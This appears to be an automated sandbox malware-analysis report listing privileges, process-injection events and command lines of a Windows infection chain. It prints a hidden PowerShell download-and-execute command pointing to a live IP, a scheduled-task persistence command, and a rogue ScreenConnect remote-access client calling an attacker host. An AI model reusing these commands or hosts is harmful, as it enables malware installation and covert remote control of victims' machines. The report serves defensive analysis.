Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2360 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1052 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1052 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1052 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2800 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2800 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1052 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2812 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1052 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2968 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1052 wrote to memory of 1048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1052 wrote to memory of 1048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1052 wrote to memory of 1048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1052 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1052 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1052 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2608 wrote to memory of 2664 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2664 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2664 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2664 wrote to memory of 2056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 2664 wrote to memory of 2056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 2664 wrote to memory of 2056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 2664 wrote to memory of 2056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 2056 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2056 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2056 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2056 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2952 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2952 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2952 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2952 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Windows\SysWOW64\WerFault.exe
PID 776 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Windows\SysWOW64\WerFault.exe
PID 776 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Windows\SysWOW64\WerFault.exe
PID 776 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Windows\SysWOW64\WerFault.exe
PID 2952 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
PID 2952 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Ot24UmakgHQ" /tr "mshta \"C:\Temp\BaWQvGOZI.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\system32\mshta.exe

mshta "C:\Temp\BaWQvGOZI.hta"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 504

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"

C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef72b9758,0x7fef72b9768,0x7fef72b9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2264 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1100 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3300 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3324 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1384 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe"

C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 508

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3720 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe

"C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\noh47" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 504

C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe

"C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 240

C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe

"C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 892781CF53AD49D0DBD7DC387AB6DC73 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIDA87.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259513060 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000060" "0000000000000560"

C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3B85572E27B2AAB122B7715E5ED4A815

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A31261E18EDE542AF332C0E7A64EC7F4 M Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=e228137a-1681-43c0-a833-6e8e39d6fe60&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "4b9ddc8f-c653-45ea-9c82-46ca4caff651" "User"

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

